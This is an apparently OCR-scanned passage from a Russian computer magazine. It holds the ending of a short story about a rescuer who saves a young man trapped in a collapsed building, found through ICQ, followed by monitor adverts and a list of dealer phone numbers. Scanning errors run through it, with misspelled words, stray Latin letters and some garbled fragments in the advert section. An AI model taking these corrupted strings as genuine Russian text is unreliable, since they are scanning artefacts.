рованный фигурный щит для пострадавших. Судя по все- 
му, парню там, наверху, он будет жизненно необходим... 


ЖЖЖЖЖЖЖЖ 


Димка открыл глаза. Он обвел взглядом свой мрачный 
capkoqpar, увидел тонкие желтые лучики, пробивающиеся 
через щели, угадал в них прожекторные лучи. 

- Ищут,- прошептал он пересохшими губами. - Меня 
ищут... Спасибо, Данка. 

И хотя искали не только его, но ему, уставшему и изму- 
ченному болью, жаждой и страхом, казалось, что все силы 
в мире сейчас направлены только на одно - найти и спаси 
его, Диму. 

Он посмотрел на погасший монитор, попытался увидеть 
в нем свое отражение, но не смог, слишком уж мало было 
света. 

- Благослови, Господи, аську и тех, кто ее придумал, - 
шепнул он себе. 

Голова закружилась, он дернулся, боль вновь взорва- 
ла его тело; стон, громкий и жалобный, сорвался с его губ. 

А внескольких десятках метров от него спасатель Теп- 
ляков поднимался по лестнице, придерживая веревку, на- 
мотанную вокруг пояса. 

- Держись, парень, - шептал он в такт своему дыханию. - 
Держись... 


ЖЖЖЖЖЖЖЖ 
Лестница казалась бесконечной; несмотря на то что бы- 


ло всего девять этажей, Теплякову показалось, что их, по 
меньшей мере, раза в два больше. Вроде бы он и не был 
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усталым, но почему-то дыхание к последнему этажу сби- 
лось окончательно. Он выбрался на крышу, швырнул щит 
себе под ноги и тяжело задышал, наклонившись и упира- 
ясь руками в колени. 

Свежий ветер привел его в порядок. Он приблизился к 
провалу, огляделся в поисках неподвижной опоры, остано- 
вил свой взгляд на спутниковой антенне и укрепил на ней 
веревку. Потом защелкнул на поясе карабин и принялся 
медленно, по паре метров, спускаться вниз, глядя себе под 
ноги. 

Тот участок плиты, что был накрыт сверху обломком по- 
толка, довольно скоро оказался у него под ногами. Тепля- 
ков раскачивался в воздухе, боясь встать на него - вполне 
возможно, что именно этим он усугубит страдания парня. 

- Эй! - крикнул он вниз. - Эй, ты там живой?! 

Тишина. Ветер немного погудел в натянутой, как струна, 
веревке и стих. Тепляков закусил губу, не зная, что же де- 
лать дальше. Он еще чуть-чуть стравил трос, вплотную 
приблизился к плите, накрывшей человека, и внимательно 
разглядел ее, пытаясь понять, что же держит ее на месте. 
Потом подумал: даже если ее можно спихнуть, то как она 
полетит вниз, туда, где расставлены сдлажки? 

- Эй, напарник,- услышал он в наушнике, - я вижу, ты 
на месте. Вертолет будет, не переживай. Помочь? 

- Что там внизу? Прямо подо мной? 

- Квадрат, что под тобой, еще считается потенциально 
опасным, но, судя по всему, людей там нет. Уже насчитали 
двадцать два человека... 

- Трупы?! 


Мощная струя воздуха, 
бьющая сверху, заставила его 
пригнуться. Откуда-то с неба 
упали тросы с люлькой. 


- Да нет, те, кто не был дома в момент взрыва. Оказы- 
вается, едва ли не полдома обреталось сегодня на даче. 
Они тут все толкутся за ограждением. Я столько мата ни- 
когда в жизни не слышал! Плюс ко всему, в этих подъездах 
восемь квартир пустуют, потому что до сих пор никем не 
куплены. Предполагается, что под завалом остались еще 
три, максимум пять человек. Эти места обозначены срлаж- 
ками. Прямо под тобой флажков нет. Думай... 

Тепляков думал недолго. 

- Поднимайся. Я постараюсь спихнуть плиту, ты спус- 
тишь мне щит и вытащишь парня. Поторопись. 

И, отдав приказ, он еще раз внимательно посмотрел на 
плиту и рискнул... 

Когда раскачанный отломок плиты полетел вниз, Теп- 
ляков увидел этого самого Димку, лежащего в немысли- 
мой позе поперек кресла; голова его была склонена на 
компьютерный стол. Компьютер и правда был цел. Одна 
из ладоней закрывала мышку, пальцы второй лежали на 
клавиатуре. 

- Вижу парня,- сказал он самому себе и всем, кто его 
слушал в данную секунду. - Давай щит, Андрей. 

Сверху скользнул блестящий прямоугольник щита, по- 
том раздался шум вертолета. Облако пыли взвилось с кры- 
ши и ринулось вниз, к Теплякову. 

Он с большим трудом сумел укрепиться на небольшом 
пятачке пола и, со всей аккуратностью подведя ремни под 
тело, закрепил Димку. Дернув трос пару раз, он крикнул: 

- Поднимай! И попроси «вертушку» пока в сторону 
отойти, ничего не видно из-за пыли! 

Щит медленно пополз вверх, отмечая своими останов- 
ками паузы, которые делал Андрей, чтобы перехватить ру- 
ки. Пыли стало поменьше, шум вертолета несколько отда- 
nunca. 

Прежде чем начать подниматься следом, Тепляков гля- 
нул вниз и увидел свою дочь рядом с вагончиком диспет- 
чера. Она сама догадалась не лезть в гущу событий, обра- 
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тилась в штаб и теперь ждала отца там с вестями о спасен- 
ном парне. Он подергал веревку и стал подниматься... 

Анорей вытащил щит на крышу, вгляделся в страдаль- 
чески измененное лицо Димы, вколол ему обезболиваю- 
щее и стал направлять вертолет. Мощная струя воздуха, 
бьющая сверху, заставила его пригнуться. Откуда-то с не- 
ба упали тросы с люлькой. 

Анорей начал закреплять щит и вдруг понял, что на 
крыше что-то не так. Огромная спутниковая антенна, слов- 
но парус, набрала в себя поток от «вертушки» и сдвину- 
лась с места. 

Тепляков почувствовал это, когда gO крыши оставалось 
метров десять. Он попытался подниматься быстрее и зак- 
ричал: 

- Антенна! Андрей, трос! Антенна! 

Напарник кинулся к опоре, ухватил рукой веревку и тут 
же понял, что ослабить узел и перехватить его полностью 
ему не удастся, а масса опоры слишком велика для того, 
чтобы ее удержал один человек. 

- ЭЙ, на вертолете, вашу мать, выше поднимайся, выше, 
ослабь напор! 

Летчик понял его не сразу. Лишь тогда, когда антенна, 
словно бумажная, взмыла в воздух и исчезла за краем 
провала. Вместе с страховочным тросом Теплякова. 

Аноарей, широко раскрыв глаза, смотрел туда, где дол- 
жен был показаться Тепляков; потом он лег на крышу и 
подполз к краю. Никого. А где-то внизу уже суетились лу- 
чи, выхватывая из темноты лежащее на камнях тело спаса- 
теля... 

Димка внезапно пришел в себя, увидел над собой горя- 
щие огни вертолета, ощутил мощную, бьющую прямо в ли- 
цо струю воздуха и внезапно сказал приблизившемуся к 
нему Андрею: 

- Благослови, Господи... 

Тот, широко раскрыв глаза, посмотрел на лежащего пе- 
ред ним парня, потом махнул рукой и тихо произнес: 

- Поднимай... 

- Не слышу вас, повторите команду,- раздался в науш- 
никах голос пилота. 

- Поднима-а-ай! - заорал Андрей и упал на колени. Щит 
взмыл в небо и исчез, оставив спасателя наедине с самим 
собой... 

...Даша проводила глазами огни в небе. Вертолет унес 
парня, так и не дав ей возможности взглянуть на него. Она 
постояла на пороге вагончика, прислушиваясь к перегово- 
рам диспетчера и спасателей, потом вытащила из кармана 
сотовый телесрон и набрала номер отца. «Абонент времен- 
но недоступен», - был ответ. Она удивленно пожала плеча- 
ми, набрала еще раз - тот же результат. Внезапно на плечо 
ей легла чья-то рука. Она тихо вскрикнула и отшатнулась. 
Это был диспетчер. 

- Ты ведь Даша Теплякова? - спросил он. 

- Да, а что? Отец что-то просил передать? 

И Bgpyr по его глазам она догадалась, что случилось 
что-то страшное. «Абонент временно недоступен...» 

он 

- Он... Он упал, Даша. Только что... Но он вытащил того 
парня... 

Девушка присела на ступеньки вагончика. Губы у нее 
затряслись, телефон выпал из рук на землю. 

- Он остался в живых,- продолжил диспетчер. - Правда, 
ему здорово досталось... Он уже по пути в больницу, тебе 
потом сообщат. Не плачь, это ведь его работа. И тот парень 
- он действительно там был... 

Чей-то вызов заставил его вернуться в диспетчерскую. 
Даша, обхватив голову, рыдала на земле у вагончика... 

- Папа,- всхлипывала она, - никогда в жизни не буду 
пользоваться этой чертовой аськой... Никогда... Никогда... 
А Димка в вертолете всю дорогу go посадочной пло- 

щадки бормотал сквозь рокот винта: 

- Благослови, Господи... Благослови... 


КОНЕЦ 


т LG LTR 


ire 

ale ies | & 

eee freedom 
^ 


ATRON F700P 


SCOMIOTHO плоский экран 74 D " V; * 
азмер точки 0,24 мм 7 1 па icto па 


астота развертки 95 кГц 


кранное разрешение 1600х1200 “i (095) 688-61-17, 683-27-65 
5 у | № WWW.DVCOMP.RU 


Москва: АБ-групп (095) 745-5175; Акситек (095) 784-7224; Банкос (095) 128-9022; ДЕЛ (095) 250-5536; Дилайн (095) 969-2222; Инкотрейд (095) 176-2873; ИНЭЛ (095) 742-6436; Карин (095) 956-1158; 
Компьютерный салон SMS (095) 956-1225; Компания КИТ (095) 777-6655; Никс (095) 974-3333; ОЛДИ (095) 105-0700; Регард (095) 912-4224; Сетевая Лаборатория (095) 784-6490; 
СКИД (095) 232-3324; Тринити Электроникс (095) 737-8046; Формоза (095) 234-2164; Ф-Центр (095) 472-6104; ЭЛСТ (095) 728-4060; Flake (095) 236-992; Force Computers (095) 775-6655; 
ISM (095) 718-4020; Meijin (095) 727-1222; NT Computer (095) 970-1930; R-Style Trading (095) 514-1414; USN Computers (095) 755-8202; ULTRA Computers (095) 729-5255; ЭЛЕКТОН (095) 956-3819; 
ПортКом (095)777-0210; Архангельск: Северная Корона (8182) 653-525; Волгоград: Texkom (8612) 699-850; Воронеж: Pet (0732) 779-339; РИАН (0732) 512-412; Сани (0732) 54-00-00; 
Иркутск: Билайн (3952) 240-024; Комтек (3952) 258-338; Краснодар: Игрек (8612) 699-850; Лабытнанги: КЦ ЯМАЛ (34992) 51777; Липецк: Регард-тур (0742) 485-285; 
Новосибирск: Квеста (38322) 332-407; Нижний Новгород: Бюро-К (8312) 422-367; Пермь: Гаском (8612) 699-850; Ростов-на-Дону: Зенит-Компьютер (8632) 950-300; 


Тюмень: ИНЭКС-Техника (3452) 390-036. 


Ничего лишнего 
зупсМазег 173P — монитор 
без кнопок на передней панели 


DigitAll минимализм монитор SyncMaster 173Р настолько совершенен, что кнопки были бы 
лишними, Программное обеспечение Samsung Magic Tune™ позволяет выполнять все настройки экрана 
с помощью мыши. Ультратонкий экран толщиной всего 2 см вращается на 160° м прекрасно смотрится 
BOSOM ракурсе. Неудивительно, что Samsung является обладателем 67 международных наград за дизайн. 
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